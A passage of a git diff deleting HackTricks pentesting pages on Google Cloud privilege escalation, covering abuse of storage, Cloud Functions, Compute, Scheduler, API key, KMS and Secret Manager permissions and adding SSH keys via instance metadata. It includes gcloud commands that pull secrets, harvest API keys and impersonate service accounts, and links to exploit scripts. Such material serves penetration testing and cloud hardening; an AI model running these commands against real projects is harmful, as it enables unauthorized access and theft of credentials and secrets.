However, I couldn't find any API endpoint to use it, so let me know if you find it. - -## container.mutatingWebhookConfigurations.create, container.mutatingWebhookConfigurations.update - -These permissions might allow you to escalate privileges in Kubernetes, but more probably, you could abuse them to **persist in the cluster**.\ -For more information [**follow this link**](../../pentesting-kubernetes/abusing-roles-clusterroles-in-kubernetes/#malicious-admission-controller). - -# storage - -## storage.hmacKeys.create - -There is a feature of Cloud Storage, "interoperability", that provides a way for Cloud Storage to interact with storage offerings from other cloud providers, like AWS S3. As part of that, there are HMAC keys that can be created for both Service Accounts and regular users. We can **escalate Cloud Storage permissions by creating an HMAC key for a higher-privileged Service Account**. - -HMAC keys belonging to your user cannot be accessed through the API and must be accessed through the web console, but what's nice is that both the access key and secret key are available at any point. This means we could take an existing pair and store them for backup access to the account. HMAC keys belonging to Service Accounts **can** be accessed through the API, but after creation, you are not able to see the access key and secret again. - -![](https://rhinosecuritylabs.com/wp-content/uploads/2020/04/image2-1.png) - -The exploit script for this method can be found [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/storage.hmacKeys.create.py). - -## storage.objects.get - -This permission allows you to **download files stored inside Gcp Storage**. This will potentially allow you to escalate privileges because on some occasions **sensitive information is saved there**. 
Moreover, some Gcp services stores their information in buckets: - -* **GCP Composer**: When you create a Composer Environment the **code of all the DAGs** will be saved inside a **bucket**. These tasks might contain interesting information inside of their code. -* **GCR (Container Registry)**: The **image** of the containers are stored inside **buckets**, which means that if you can read the buckets you will be able to download the images and **search for leaks and/or source code**. - -## storage.objects.create, storage.objects.delete - -In order to **create a new object** inside a bucket you need `storage.objects.create` and, according to [the docs](https://cloud.google.com/storage/docs/access-control/iam-permissions#object\_permissions), you need also `storage.objects.delete` to **modify** an existent object. - -A very **common exploitation** of buckets where you can write in cloud is in case the **bucket is saving web server files**, you might be able to **store new code** that will be used by the web application. - -Moreover, several GCP services also **store code inside buckets** that later is **executed**: - -* **GCP Composer**: The **DAG code** is **stored in GCP Storage**. This **code** is later **executed** inside the **K8s environment** used by composer, and has also **access to a GCP SA**. Therefore, modifying this code you might be able to get inside the composer k8s env and steal the token of the GCP SA used. -* **GCR (Container Registry)**: The **container images are stored inside buckets**. So if you have write access over them, you could **modify the images** and execute your own code whenever that container is used. - * The bucket used by GCR will have an URL similar to `gs://.artifacts..appspot.com` (The top level subdomains are specified [here](https://cloud.google.com/container-registry/docs/pushing-and-pulling)). - -## storage.objects.setIamPolicy - -You can give you permission to **abuse any of the previous scenarios of this section**. 
- -# storage.objects Write permission - -If you can modify or add objects in buckets you might be able to escalate your privileges to other resources that are using the bucket to store code that they execute. - -## Composer - -**Composer** is **Apache Airflow** managed inside GCP. It has several interesting features: - -* It runs inside a **GKE cluster**, so the **SA the cluster uses is accesible** by the code running inside Composer -* It stores the **code in a bucket**, therefore, **anyone with write access over that bucket** is going to be able change/add a DGA code (the code Apache Airflow will execute)\ - Then, if you have **write access over the bucket Composer is using** to store the code you can **privesc to the SA running in the GKE cluster**. - -# References - -* [https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/) -* [https://rhinosecuritylabs.com/cloud-security/privilege-escalation-google-cloud-platform-part-2/](https://rhinosecuritylabs.com/cloud-security/privilege-escalation-google-cloud-platform-part-2/#gcp-privesc-scanner) - - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
- - diff --git a/cloud-security/gcp-security/gcp-interesting-permissions/gcp-privesc-to-resources.md b/cloud-security/gcp-security/gcp-interesting-permissions/gcp-privesc-to-resources.md deleted file mode 100644 index 331a448f0..000000000 --- a/cloud-security/gcp-security/gcp-interesting-permissions/gcp-privesc-to-resources.md +++ /dev/null @@ -1,269 +0,0 @@ - - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
- - -# cloudfunctions - -## cloudfunctions.functions.create,iam.serviceAccounts.actAs - -For this method, we will be **creating a new Cloud Function with an associated Service Account** that we want to gain access to. Because Cloud Function invocations have **access to the metadata** API, we can request a token directly from it, just like on a Compute Engine instance. - -The **required permissions** for this method are as follows: - -* _cloudfunctions.functions.call_ **OR** _cloudfunctions.functions.setIamPolicy_ -* _cloudfunctions.functions.create_ -* _cloudfunctions.functions.sourceCodeSet_ -* _iam.serviceAccounts.actAs_ - -The script for this method uses a premade Cloud Function that is included on GitHub, meaning you will need to upload the associated .zip file and make it public on Cloud Storage (see the exploit script for more information). Once the function is created and uploaded, you can either invoke the function directly or modify the IAM policy to allow you to invoke the function. The response will include the access token belonging to the Service Account assigned to that Cloud Function. - -![](https://rhinosecuritylabs.com/wp-content/uploads/2020/04/image12-750x618.png) - -The script creates the function and waits for it to deploy, then it runs it and gets returned the access token. - -The exploit scripts for this method can be found [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/cloudfunctions.functions.create-call.py) and [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/cloudfunctions.functions.create-setIamPolicy.py) and the prebuilt .zip file can be found [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/tree/master/ExploitScripts/CloudFunctions). 
- -## cloudfunctions.functions.update,iam.serviceAccounts.actAs - -Similar to _cloudfunctions.functions.create_, this method **updates (overwrites) an existing function instead of creating a new one**. The API used to update the function also allows you to **swap the Service Account if you have another one you want to get the token for**. The script will update the target function with the malicious code, then wait for it to deploy, then finally invoke it to be returned the Service Account access token. - -The following **permissions are required** for this method: - -* _cloudfunctions.functions.sourceCodeSet_ -* _cloudfunctions.functions.update_ -* _iam.serviceAccounts.actAs_ - -The exploit script for this method can be found [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/cloudfunctions.functions.update.py). - -# compute - -## compute.instances.create,iam.serviceAccounts.actAs - -This method **creates a new Compute Engine instance with a specified Service Account**, then **sends the token** belonging to that Service Account to an **external server.** - -The following **permissions are required** for this method: - -* _compute.disks.create_ -* _compute.instances.create_ -* _compute.instances.setMetadata_ -* _compute.instances.setServiceAccount_ -* _compute.subnetworks.use_ -* _compute.subnetworks.useExternalIp_ -* _iam.serviceAccounts.actAs_ - -![](https://rhinosecuritylabs.com/wp-content/uploads/2020/04/image9-750x594.png) - -The exploit script for this method can be found [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/compute.instances.create.py). - -# run - -## run.services.create,iam.serviceAccounts.actAs - -Similar to the _cloudfunctions.functions.create_ method, this method creates a **new Cloud Run Service** that, when invoked, **returns the Service Account’s** access token by accessing the metadata API of the server it is running on. 
A Cloud Run service will be deployed and a request can be performed to it to get the token. - -The following **permissions are required** for this method: - -* _run.services.create_ -* _iam.serviceaccounts.actAs_ -* _run.services.setIamPolicy_ **OR** _run.routes.invoke_ - -![](https://rhinosecuritylabs.com/wp-content/uploads/2020/04/image8-1000x503.png) - -This method uses an included Docker image that must be built and hosted to exploit correctly. The image is designed to tell Cloud Run to respond with the Service Account’s access token when an HTTP request is made. - -The exploit script for this method can be found [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/run.services.create.py) and the Docker image can be found [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/tree/master/ExploitScripts/CloudRunDockerImage). - -# Cloudscheduler - -## cloudscheduler.jobs.create,iam.serviceAccounts.actAs - -Cloud Scheduler allows you to set up cron jobs targeting arbitrary HTTP endpoints. **If that endpoint is a \*.googleapis.com endpoint**, then you can also tell Scheduler that you want it to authenticate the request **as a specific Service Account**, which is exactly what we want. - -Because we control all aspects of the HTTP request being made from Cloud Scheduler, we can set it up to hit another Google API endpoint. 
For example, if we wanted to create a new job that will use a specific Service Account to create a new Storage bucket on our behalf, we could run the following command: - -``` -gcloud scheduler jobs create http test --schedule='* * * * *' --uri='https://storage.googleapis.com/storage/v1/b?project=' --message-body "{'name':'new-bucket-name'}" --oauth-service-account-email 111111111111-compute@developer.gserviceaccount.com --headers Content-Type=application/json -``` - -This command would schedule an HTTP POST request for every minute that authenticates as _111111111111-compute@developer.gserviceaccount.com_. The request will hit the Cloud Storage API endpoint and will create a new bucket with the name "new-bucket-name". - -The following permissions are required for this method: - -* _cloudscheduler.jobs.create_ -* _cloudscheduler.locations.list_ -* _iam.serviceAccounts.actAs_ - -To escalate our privileges with this method, we just need to **craft the HTTP request of the API we want to hit as the Service Account we pass in**. Instead of a script, you can just use the gcloud command above. - -A similar method may be possible with Cloud Tasks, but we were not able to do it in our testing. - -# orgpolicy - -## orgpolicy.policy.set - -This method does **not necessarily grant you more IAM permissions**, but it may **disable some barriers** that are preventing certain actions. For example, there is an Organization Policy constraint named _appengine.disableCodeDownload_ that prevents App Engine source code from being downloaded by users of the project. If this was enabled, you would not be able to download that source code, but you could use _orgpolicy.policy.set_ to disable the constraint and then continue with the source code download. - -![](https://rhinosecuritylabs.com/wp-content/uploads/2020/04/image5-1.png) - -The screenshot above shows that the _appengine.disableCodeDownload_ constraint is enforced, which means it is preventing us from downloading the source code. 
Using _orgpolicy.policy.set_, we can disable that enforcement and then continue on to download the source code. - -The exploit script for this method can be found [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/orgpolicy.policy.set.py). - -# serviceusage - -The following permissions are useful to create and steal API keys, not this from the docs: _An API key is a simple encrypted string that **identifies an application without any principal**. They are useful for accessing **public data anonymously**, and are used to **associate** API requests with your project for quota and **billing**._ - -Therefore, with an API key you can make that company pay for your use of the API, but you won't be able to escalate privileges. - -## serviceusage.apiKeys.create - -There is another method of authenticating with GCP APIs known as API keys. By default, they are created with no restrictions, which means they have access to the entire GCP project they were created in. We can capitalize on that fact by creating a new API key that may have more privileges than our own user. There is no official API for this, so a custom HTTP request needs to be sent to _https://apikeys.clients6.google.com/_ (or _https://apikeys.googleapis.com/_). This was discovered by monitoring the HTTP requests and responses while browsing the GCP web console. For documentation on the restrictions associated with API keys, visit [this link](https://cloud.google.com/docs/authentication/api-keys). - -The following screenshot shows how you would create an API key in the web console. - -![](https://rhinosecuritylabs.com/wp-content/uploads/2020/04/image6-1.png) - -With the undocumented API that was discovered, we can also create API keys through the API itself. - -The screenshot above shows a POST request being sent to retrieve a new API key for the project. 
- -The exploit script for this method can be found [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/serviceusage.apiKeys.create.py). - -## serviceusage.apiKeys.list - -Another undocumented API was found for listing API keys that have already been created (this can also be done in the web console). Because you can still see the API key’s value after its creation, we can pull all the API keys in the project. - -![](https://rhinosecuritylabs.com/wp-content/uploads/2020/04/image4-1.png) - -The screenshot above shows that the request is exactly the same as before, it just is a GET request instead of a POST request. This only shows a single key, but if there were additional keys in the project, those would be listed too. - -The exploit script for this method can be found [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/serviceusage.apiKeys.list.py). - -# apikeys - -The following permissions are useful to create and steal API keys, not this from the docs: _An API key is a simple encrypted string that **identifies an application without any principal**. They are useful for accessing **public data anonymously**, and are used to **associate** API requests with your project for quota and **billing**._ - -Therefore, with an API key you can make that company pay for your use of the API, but you won't be able to escalate privileges. - -## apikeys.keys.create - -This permission allows to **create an API key**: - -```bash -gcloud alpha services api-keys create -Operation [operations/akmf.p7-[...]9] complete. 
Result: { - "@type":"type.googleapis.com/google.api.apikeys.v2.Key", - "createTime":"2022-01-26T12:23:06.281029Z", - "etag":"W/\"HOhA[...]==\"", - "keyString":"AIzaSy[...]oU", - "name":"projects/5[...]6/locations/global/keys/f707[...]e8", - "uid":"f707[...]e8", - "updateTime":"2022-01-26T12:23:06.378442Z" -} -``` - -You can find a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp\_privesc\_scripts/blob/main/tests/b-apikeys.keys.create.sh). - -## apikeys.keys.getKeyString,apikeys.keys.list - -These permissions allows **list and get all the apiKeys and get the Key**: - -```bash -gcloud alpha services api-keys create -for key in $(gcloud --impersonate-service-account="${SERVICE_ACCOUNT_ID}@${PROJECT_ID}.iam.gserviceaccount.com" alpha services api-keys list --uri); do - gcloud --impersonate-service-account="${SERVICE_ACCOUNT_ID}@${PROJECT_ID}.iam.gserviceaccount.com" alpha services api-keys get-key-string "$key" -done -``` - -You can find a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp\_privesc\_scripts/blob/main/tests/c-apikeys.keys.getKeyString.sh). - -## apikeys.keys.regenerate,apikeys.keys.list - -These permissions will (potentially) allow you to **list and regenerate all the apiKeys getting the new Key**.\ -It’s not possible to use this from `gcloud` but you probably can use it via the API. Once it’s supported, the exploitation will be similar to the previous one (I guess). 
- -## apikeys.keys.lookup - -This is extremely useful to check **which GCP project an API key that you have found belongs to**: - -```bash -gcloud alpha services api-keys lookup AIzaSyD[...]uE8Y -name: projects/5[...]6/locations/global/keys/28d[...]e0e -parent: projects/5[...]6/locations/global -``` - -In this scenario it could also be interesting to run the tool [https://github.com/ozguralp/gmapsapiscanner](https://github.com/ozguralp/gmapsapiscanner) and check what you can access with the API key. - -# secretmanager - -## secretmanager.secrets.get - -This gives you access to read the secrets from the secret manager. - -## secretmanager.secrets.setIamPolicy - -This gives you the ability to grant yourself access to read the secrets from the secret manager. - -# \*.setIamPolicy - -If you own a user that has the **`setIamPolicy`** permission in a resource you can **escalate privileges in that resource** because you will be able to change the IAM policy of that resource and give yourself more privileges over it. - -* _cloudfunctions.functions.setIamPolicy_ - * Modify the policy of a Cloud Function to allow yourself to invoke it. - -There are tens of resource types with this kind of permission, you can find all of them in [https://cloud.google.com/iam/docs/permissions-reference](https://cloud.google.com/iam/docs/permissions-reference) searching for setIamPolicy. - -An **example** of privilege escalation abusing .setIamPolicy (in this case in a bucket) can be found here: - -{% content-ref url="../gcp-buckets-brute-force-and-privilege-escalation.md" %} -[gcp-buckets-brute-force-and-privilege-escalation.md](../gcp-buckets-brute-force-and-privilege-escalation.md) -{% endcontent-ref %} - -# Generic Interesting Permissions - -## \*.create, \*.update - -These permissions can be very useful to try to escalate privileges in resources by **creating a new one or updating an existing one**. 
These kinds of permissions are especially useful if you also have the permission **iam.serviceAccounts.actAs** over a Service Account and the resource you have .create/.update over can attach a service account. - -## \*ServiceAccount\* - -This permission will usually let you **access or modify a Service Account in some resource** (e.g.: compute.instances.setServiceAccount). This **could lead to a privilege escalation** vector, but it will depend on each case. - -# References - -* [https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/) -* [https://rhinosecuritylabs.com/cloud-security/privilege-escalation-google-cloud-platform-part-2/](https://rhinosecuritylabs.com/cloud-security/privilege-escalation-google-cloud-platform-part-2/#gcp-privesc-scanner) - - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
- - diff --git a/cloud-security/gcp-security/gcp-kms-and-secrets-management-enumeration.md b/cloud-security/gcp-security/gcp-kms-and-secrets-management-enumeration.md deleted file mode 100644 index f79ceab6a..000000000 --- a/cloud-security/gcp-security/gcp-kms-and-secrets-management-enumeration.md +++ /dev/null @@ -1,76 +0,0 @@ - - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
- - -# Crypto Keys - -[Cloud Key Management Service](https://cloud.google.com/kms/docs/) is a repository for storing cryptographic keys, such as those used to **encrypt and decrypt sensitive files**. Individual keys are stored in key rings, and granular permissions can be applied at either level. - -Having **permissions to list the keys** this is how you can access them: - -```bash -# List the global keyrings available -gcloud kms keyrings list --location global - -# List the keys inside a keyring -gcloud kms keys list --keyring [KEYRING NAME] --location global - -# Decrypt a file using one of your keys -gcloud kms decrypt --ciphertext-file=[INFILE] \ - --plaintext-file=[OUTFILE] \ - --key [KEY] \ - --keyring [KEYRING] \ - --location global -``` - -# Secrets Management - -Google [Secrets Management](https://cloud.google.com/solutions/secrets-management/) is a vault-like solution for storing passwords, API keys, certificates, and other sensitive data. As of this writing, it is currently in beta. - -```bash -# First, list the entries -gcloud beta secrets list - -# Then, pull the clear-text of any secret -gcloud beta secrets versions access 1 --secret="[SECRET NAME]" -``` - -Note that changing a secret entry will create a new version, so it's worth changing the `1` in the command above to a `2` and so on. - -# References - -* [https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/#reviewing-stackdriver-logging](https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/#reviewing-stackdriver-logging) - - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
- - diff --git a/cloud-security/gcp-security/gcp-local-privilege-escalation-ssh-pivoting.md b/cloud-security/gcp-security/gcp-local-privilege-escalation-ssh-pivoting.md deleted file mode 100644 index be89b20b9..000000000 --- a/cloud-security/gcp-security/gcp-local-privilege-escalation-ssh-pivoting.md +++ /dev/null @@ -1,291 +0,0 @@ - - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
- - -In this scenario we are going to suppose that you **have compromised a non-privileged account** inside a VM in a Compute Engine project. - -Amazingly, GCP permissions of the compute engine you have compromised may help you to **escalate privileges locally inside a machine**. Even if that won't always be very helpful in a cloud environment, it's good to know it's possible. - -# OS Patching -Depending on the privileges associated with the service account you have access to, if it has either the `osconfig.patchDeployments.create` or `osconfig.patchJobs.exec` permissions you can create a [patch job or deployment](https://blog.raphael.karger.is/articles/2022-08/GCP-OS-Patching). This will enable you to move laterally in the environment and gain code execution on all the compute instances within a project. - -First check all the roles the account has: - -`gcloud iam roles list` - -Now check the permissions offered by the role, if it has access to either the patch deployment or job continue. - -`gcloud iam roles describe roles/ | grep -E '(osconfig.patchDeployments.create|osconfig.patchJobs.exec)'` - - -If you want to manually exploit this you will need to create either a [patch job](https://github.com/rek7/patchy/blob/main/pkg/engine/patches/patch_job.json) or [deployment](https://github.com/rek7/patchy/blob/main/pkg/engine/patches/patch_deployment.json). For a patch job, run: - -`gcloud compute os-config patch-jobs execute --file=patch.json` - - -To deploy a patch deployment: - -`gcloud compute os-config patch-deployments create my-update --file=patch.json` - -Automated tooling such as [patchy](https://github.com/rek7/patchy) exists to detect lax permissions and automatically move laterally. - -# Read the scripts - -**Compute Instances** are probably there to **execute some scripts** to perform actions with their service accounts. - -As IAM is so granular, an account may have **read/write** privileges over a resource but **no list privileges**. 
- -A great hypothetical example of this is a Compute Instance that has permission to read/write backups to a storage bucket called `instance82736-long-term-xyz-archive-0332893`. - -Running `gsutil ls` from the command line returns nothing, as the service account is lacking the `storage.buckets.list` IAM permission. However, if you ran `gsutil ls gs://instance82736-long-term-xyz-archive-0332893` you may find a complete filesystem backup, giving you clear-text access to data that your local Linux account lacks. - -You may be able to find this bucket name inside a script (in bash, Python, Ruby...). - -# Custom Metadata - -Administrators can add [custom metadata](https://cloud.google.com/compute/docs/storing-retrieving-metadata#custom) at the instance and project level. This is simply a way to pass **arbitrary key/value pairs into an instance**, and is commonly used for environment variables and startup/shutdown scripts. - -```bash -# view project metadata -curl "http://metadata.google.internal/computeMetadata/v1/project/attributes/?recursive=true&alt=text" \ - -H "Metadata-Flavor: Google" - -# view instance metadata -curl "http://metadata.google.internal/computeMetadata/v1/instance/attributes/?recursive=true&alt=text" \ - -H "Metadata-Flavor: Google" -``` - -# Modifying the metadata - -If you can **modify the instance's metadata**, there are numerous ways to escalate privileges locally. There are a few scenarios that can lead to a service account with this permission: - -_**Default service account**_\ -If the service account access **scope** is set to **full access** or at least is explicitly allowing **access to the compute API**, then this configuration is **vulnerable** to escalation. The **default** **scope** is **not** **vulnerable**. 
- -_**Custom service account**_\ -When using a custom service account, **one** of the following IAM permissions **is** **necessary** to escalate privileges: - -* `compute.instances.setMetadata` (to affect a single instance) -* `compute.projects.setCommonInstanceMetadata` (to affect all instances in the project) - -Although Google [recommends](https://cloud.google.com/compute/docs/access/service-accounts#associating\_a\_service\_account\_to\_an\_instance) not using access scopes for custom service accounts, it is still possible to do so. You'll need one of the following **access scopes**: - -* `https://www.googleapis.com/auth/compute` -* `https://www.googleapis.com/auth/cloud-platform` - -## **Add SSH keys to custom metadata** - -**Linux** **systems** on GCP will typically be running [Python Linux Guest Environment for Google Compute Engine](https://github.com/GoogleCloudPlatform/compute-image-packages/tree/master/packages/python-google-compute-engine#accounts) scripts. One of these is the [accounts daemon](https://github.com/GoogleCloudPlatform/compute-image-packages/tree/master/packages/python-google-compute-engine#accounts), which **periodically** **queries** the instance metadata endpoint for **changes to the authorized SSH public keys**. - -**If a new public** key is encountered, it will be processed and **added to the local machine**. Depending on the format of the key, it will either be added to the `~/.ssh/authorized_keys` file of an **existing user or will create a new user with `sudo` rights**. - -So, if you can **modify custom instance metadata** with your service account, you can **escalate** to root on the local system by **gaining SSH rights** to a privileged account. If you can modify **custom project metadata**, you can **escalate** to root on **any system in the current GCP project** that is running the accounts daemon. 
- -## **Add SSH key to existing privileged user** - -Let's start by adding our own key to an existing account, as that will probably make the least noise. - -**Check the instance for existing SSH keys**. Pick one of these users as they are likely to have sudo rights. - -```bash -gcloud compute instances describe [INSTANCE] --zone [ZONE] -``` - -Look for a section like the following: - -``` - ... - metadata: - fingerprint: QCZfVTIlKgs= - items: - ... - - key: ssh-keys - value: |- - alice:ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC/SQup1eHdeP1qWQedaL64vc7j7hUUtMMvNALmiPfdVTAOIStPmBKx1eN5ozSySm5wFFsMNGXPp2ddlFQB5pYKYQHPwqRJp1CTPpwti+uPA6ZHcz3gJmyGsYNloT61DNdAuZybkpPlpHH0iMaurjhPk0wMQAMJUbWxhZ6TTTrxyDmS5BnO4AgrL2aK+peoZIwq5PLMmikRUyJSv0/cTX93PlQ4H+MtDHIvl9X2Al9JDXQ/Qhm+faui0AnS8usl2VcwLOw7aQRRUgyqbthg+jFAcjOtiuhaHJO9G1Jw8Cp0iy/NE8wT0/tj9smE1oTPhdI+TXMJdcwysgavMCE8FGzZ alice - bob:ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC2fNZlw22d3mIAcfRV24bmIrOUn8l9qgOGj1LQgOTBPLAVMDAbjrM/98SIa1NainYfPSK4oh/06s7xi5B8IzECrwqfwqX0Z3VbW9oQbnlaBz6AYwgGHE3Fdrbkg/Ew8SZAvvvZ3bCwv0i5s+vWM3ox5SIs7/W4vRQBUB4DIDPtj0nK1d1ibxCa59YA8GdpIf797M0CKQ85DIjOnOrlvJH/qUnZ9fbhaHzlo2aSVyE6/wRMgToZedmc6RzQG2byVxoyyLPovt1rAZOTTONg2f3vu62xVa/PIk4cEtCN3dTNYYf3NxMPRF6HCbknaM9ixmu3ImQ7+vG3M+g9fALhBmmF bob - ... -``` - -Notice the **slightly odd format** of the public keys - the **username** is listed at the **beginning** (followed by a colon) and then again at the **end**. We'll need to match this format. Unlike normal SSH key operation, the username absolutely matters! - -**Save the lines with usernames and keys in a new text** file called `meta.txt`. - -Let's assume we are targeting the user `alice` from above. 
